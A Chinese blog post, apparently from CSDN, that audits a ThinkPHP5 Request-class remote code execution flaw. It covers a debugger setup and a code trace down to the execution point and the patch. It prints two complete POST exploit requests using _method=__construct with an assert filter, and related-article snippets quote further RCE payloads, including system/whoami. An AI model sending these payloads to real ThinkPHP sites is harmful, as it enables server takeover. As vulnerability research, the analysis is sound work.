php request漏洞利用,ThinkPHP5 核心类 Request 远程代码漏洞分析

最新推荐文章于 2023-10-08 10:44:43 发布
最新推荐文章于 2023-10-08 10:44:43 发布
阅读量565 收藏
点赞数
文章标签: php request漏洞利用

ThinkPHP5 核心类 Request 远程代码漏洞分析

先说下xdebug+phpstorm审计环境搭建:

php.ini添加如下配置,在phpinfo页面验证是否添加成功。

[XDebug]

;xdebug.profiler_output_dir="D:\phpStudy\tmp\xdebug"

;xdebug.trace_output_dir="D:\phpStudy\tmp\xdebug"

zend_extension="D:\phpstudy\php\php-5.5.38\ext\php_xdebug.dll"

xdebug.auto_trace = 1

xdebug.trace_format = 0

xdebug.trace_output_dir="D:\phpstudy\tmp\xdebug"

xdebug.trace_options = 0

xdebug.collect_params = 4

xdebug.collect_return = 1

xdebug.collect_vars = 1

xdebug.collect_assignments = 1

xdebug.profiler_append = 0

xdebug.profiler_enable = 1

xdebug.profiler_enable_trigger = 0

xdebug.profiler_output_name="cache.out.%t-%s"

xdebug.profiler_output_dir="D:\phpstudy\tmp\XCache"

xdebug.remote_enable = 1

xdebug.remote_enable = on

xdebug.remote_port = 9000

xdebug.remote_mode = "req"

xdebug.remote_handler = "dbgp"

xdebug.remote_host = "127.0.0.1"

xdebug.remote_autostart = on

xdebug.idekey="PHPSTORM"

配置phpstorm设置里的Server

1265ad9c1699ae434104b6ee17323269.png

配置phpstorm设置里的debug port端口和上面配置文件开放端口一致

6f5b5c7206a38052a9b4bb54d73f6b98.png

验证xdebug是否配置成功,注意create validation script选择网站根目录

6a760cd1453b82cf39f138c8d408ae27.png

db8d76ed3e1fda0923a5a8416a338d2d.png

火狐浏览器下载插件并开启

f74d79b65b21ebe7bc0e2a35568e31f2.png

phpstorm下断点并开启debug,浏览器访问就能在断点处停住

ca17da462645d5b7fce22fa7fac04fc4.png 参考链接:https://blog.csdn.net/flyingdream123/article/details/69358819 版本使用的是5.0.2.3,需要开启debug模式先给出poc如下:

POST /thinkphp5_0/public/index.php?s=captcha HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0; Waterfox) Gecko/20100101 Firefox/56.2.5

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Content-Type: application/x-www-form-urlencoded

Content-Length: 80

Cookie: thinkphp_show_page_trace=0|0; security_level=0; ECS[visit_times]=1; PHPSESSID=cme4h35lc29jj7uk4ne4640p26

Connection: close

Upgrade-Insecure-Requests: 1

_method=__construct&filter[]=assert&server[REQUEST_METHOD]=phpinfo();

主要就是method方法的问题,在这里下断,第一次method==false走到elseif分支this->method变量赋值为_CONSTRUCT。相当于调用当前类的构造函数,跟进

01a5973a6663d0c0a1cdcd2d7e45065b.png 构造函数意思是,如果当前类存在属性,就将其重新赋值。这里server,filter都被重新赋值

b012a99594285fe8aeb6e845863f975c.png 跟到当前类的126行,调用param方法,这里debug设置为true才会走到if分支

dd4388e65997c5906764e91281172c40.png 调用this->method(true)

76f802eb17cdb24fe51870c9609a63de.png 这次调用了method方法的if分支,跟入server方法

c24be8fa048b6f221ff83358e2fcbffe.png server的值被传入input函数,跟入

1152ef3c39688bfb8c24795feb73260a.png server值赋值给data,1026行获取过滤器的值,前面赋值为assert.继续跟到1032行filterValue函数

f570d0176fd3cb059f36db1b5d36d271.png 这里导致命令执行

cad86b29f474b7fd4f0884775399d7f7.png 看下补丁,this->method不让调用任意方法。

97becb8d85cd55cd8f1b73ac842db66f.png 还有一种payload不用debug模式也可以RCE:

POST /thinkphp5_0/public/index.php?s=captcha HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0; Waterfox) Gecko/20100101 Firefox/56.2.5

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Content-Type: application/x-www-form-urlencoded

Content-Length: 80

Cookie: thinkphp_show_page_trace=0|0; security_level=0; ECS[visit_times]=1; PHPSESSID=cme4h35lc29jj7uk4ne4640p26

Connection: close

Upgrade-Insecure-Requests: 1

_method=__construct&method=get&filter[]=assert&server[REQUEST_METHOD]=phpinfo();

给filter变量赋值后,调用param方法就能导致RCE。 下面就是漏洞触发点的位置

826e4534f882dc11281a191df41f0ab7.png

姚脑师
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
thinkphp恶意写入php代码,漏洞报告 | ThinkPHP配置不当可导致远程代码执行
weixin_30653101的博客
04-08 405
ThinkPHP配置不当可导致远程代码执行漏洞分析报告1. 漏洞描述ThinkPHP是一款国内流行的开源PHP框架,近日被爆出存在可能的远程代码执行漏洞,攻击者可向缓存文件内写入PHP代码,导致远程代码执行。虽然该漏洞利用需要有几个前提条件,但鉴于国内使用ThinkPHP框架的站点数量之多,该漏洞还是存在一定的影响范围。2. 漏洞危害攻击者可通过该漏洞获取网站的控制权限,可修改页面,导致数据泄漏等...
php5渗透,ThinkPHP的一些渗透方式
weixin_30396323的博客
03-11 941
下面由thinkphp框架教程栏目给大家介绍ThinkPHP的一些渗透方式,希望对需要的朋友有所帮助!ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,可以支持Windows/Unix/Linux等服务器环境,正式版需要PHP5.0以上版本支持,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展。Runtime日志在ThinkPHP3的版本中,入口文件index.p...
[Vulfocus解题系列]ThinkPHP5 远程代码执行漏洞(CNVD-2018-24942)
00勇士王子的博客
07-04 1130
漏洞介绍 ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。 影响版本 ThinkPHP 5.*,<5.1.31 ThinkPHP <=5.0.23 解题过程 1.开启靶场环境 2.在其地址增加路径与参数即可,最后是需要执行的命令 ls /tmp /index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&am
ThinkPHP一键检测ThinkPHP漏洞,漏洞检测工具
程序发烧猿's Blog
02-24 8184
本工具一键检测网上流行的ThinkPHP漏洞,如存在漏洞请尽快修复。漏洞可造成shell提权,直接用中国菜刀就可以连接,修改服务器文件!危害极大!最好是禁用eval等危险函数!
thinkphp5.0远程代码执行漏洞利用分析
飞鱼的企鹅的博客
08-30 2249
环境 版本:thinkphp5.0.20(实际环境<5.0.23即可) 配置:apache2,php5- 简介 2018年thinkphp官方更新了补丁,说明“由于框架对控制器名没有进行足够的检测,会导致在没有开启强制路由的情况下可能getshell的漏洞”。 漏洞分析 简介上说明了是路由调度时可能触发漏洞,所以就定位到pathinfo()函数。pathinfo()函数是thinkphp的一...
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
### ThinkPHP 5.0 远程代码执行漏洞分析 #### 漏洞背景与概述 ThinkPHP是一款广泛使用的PHP框架,它提供了丰富的功能和良好的性能。然而,如同任何复杂的软件系统一样,它也存在安全漏洞。本次分析的焦点集中在...
php 上传文件型判断函数(避免上传漏洞 )
12-17
在Laravel框架中,文件上传通常通过`Storage` facade或者`Form Request`进行处理,提供了一套完善的上传机制。 在ThinkPHP框架中,也有似的文件上传助手函数或服务,可以方便地处理文件上传,并且能够轻松配置...
ThinkPHP5 的简单搭建和使用详解
10-17
ThinkPHP5的目录结构非常清晰,主要分为核心目录和应用目录两大核心目录`thinkphp`包含了框架的核心文件,而应用目录`application`则放置了开发者主要需要操作的模型、视图和控制器(MVC)。具体来说: 1. `...
thinkPHP5实现数据库添加内容的方法
10-19
ThinkPHP5作为一款轻量级的PHP开发框架,其数据库操作是Web开发中的核心部分。在ThinkPHP5框架中,实现数据库添加内容的基本步骤涉及数据库配置、控制器的编写、模型的应用以及实际的数据插入操作。本知识点将详细...
thinkPHP5框架接口写法简单示例
10-16
模型(Model)是ThinkPHP5框架中处理数据的核心,它们通常继承自`think\Model`,并被用来实现与数据库表的交互。示例中的`Address`继承自`Model`,它提供了`addAddress`方法用于添加一个新的地址记录。模型中的...
tp5的属性不存在_thinkPHP5.1框架中Request四种调用方式示例
weixin_39702559的博客
12-19 543
本文实例讲述了thinkPHP5.1框架中Request四种调用方式。分享给大家供大家参考,具体如下:1. 传统调用访问方式:http://127.0.0.1/demo/demo3/test?name=kk&age=22/*** Created by PhpStorm.* User: 10475* Date: 2018/8/27* Time: 22:59*/namespace app\d...
ThinkPHP5.0.5_变量覆盖导致的RCE漏洞分析
11-21 1441
TP5.0.5_变量覆盖导致的RCE漏洞分析 TP的RCE漏洞有两个大版本的区别 TP 5.0-5.0.24 这个RCE在5.0.13之后的版本需要开启debug模式 TP 5.1.0-5.1.30 POChttp://localhost:8009/public/index.php POST: _method=__construct&method=GET&filter[]=system&s=whoami 漏洞分析 在经过App::routeCheck()->Ro
ThinkPHP6.x的COOKIE中总是带有:thinkphp_show_page_trace=0|0
最新发布
cihron的博客
10-08 289
ThinkPHP6.x的cookie中总带:thinkphp_show_page_trace=0|0,不但容易暴露后台服务器使用了ThinkPHP,而且对于强迫症的程序员工来说总是感觉心里太不爽了。这个是开启trace页面调试跟踪后造成的,也是说在.env文件中设置了“APP_DEBUG = true”。在.env文件中设置“APP_DEBUG = false”,并且关闭浏览器,必要时可以清空一下浏览器缓存。这回是不是感觉清爽了:-?
ThinkPHP5系列远程代码执行漏洞复现(详细)
weixin_53730939的博客
03-20 8592
ThinkPHP5系列远程代码执行漏洞复现(详细)
关闭Thinkphp右下角调试trace图标SHOW_PAGE_TRACE
潮虫创意工作室
09-26 4058
Thinkphp是比较常见的系统框架了,有些大佬做出来的源代码都有一个调试信息的右下角图标,为了方便调试当然是很好的,但是正式运营不能存在这个LOGO,这样会暴露很多信息! 那怎么去掉呢?日常百度CSDN,看了几个教程是这样的: 1.在入口文件index.php 加入 define( “APP_DEBUG” , false); 2.在config.php 配置文件中加入 ‘SHOW_PAGE_TRACE’ => false搜索 3.然后删除缓存文件夹Runtime,刷新页面 结果什么用也没有,甚至.
记一次渗透实战
crowsec
01-26 966
微信公众号:乌鸦安全 扫取二维码获取更多信息! 更新时间:2021.05.14 01 前提 在早些时候看到先知上有一篇关于thinkphp rce的实战文章 https://xz.aliyun.com/t/6267 于是顺着师傅的思路也来试试 从网上顺利找到的某一个相似的站点,然后就按照师傅的思路来了 02geshell之路 通过报错的方式发现了当前的版本为 ThinkPHPV5.0.23 通过师傅的思路,先去找phpinfo界面 http:/...
thinkphp5 mysql缓存_利用Thinkphp 5缓存漏洞实现前台Getshell
weixin_42494890的博客
01-30 264
0×00 背景网站为了实现加速访问,会将用户访问过的页面存入缓存来减小数据库查询的开销。而Thinkphp5框架的缓存漏洞使得在缓存中注入代码成为可能。(漏洞详情见参考资料)本文将会详细讲解:1. 如何判断缓存漏洞存在的可能性2. 如何利用Thinkphp5的框架漏洞结合网站的一些配置实现前台getshell希望可以给予读者一些关于漏洞应用的启发。0×01 环境测试环境1.某基于Thinkphp5...
Thinkphp中页面的SHOW_PAGE_TRACE调试功能
Anwous的博客
04-07 8355
在config中开启SHOW_PAGE_TRACE功能,能获取页面的详细信息
2 690.00 php,记一次有趣的tp5代码执行
weixin_42317885的博客
04-01 462
0x00 前言朋友之前给了个站,拿了很久终于拿下,简单记录一下。0x01 基础信息漏洞点:tp 5 method 代码执行,payload如下 POST /?s=captcha_method=__construct&method=get&filter[]=assert&server[]=1&get[]=1无回显,根据payload 成功判断目标thinkphp 版本...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值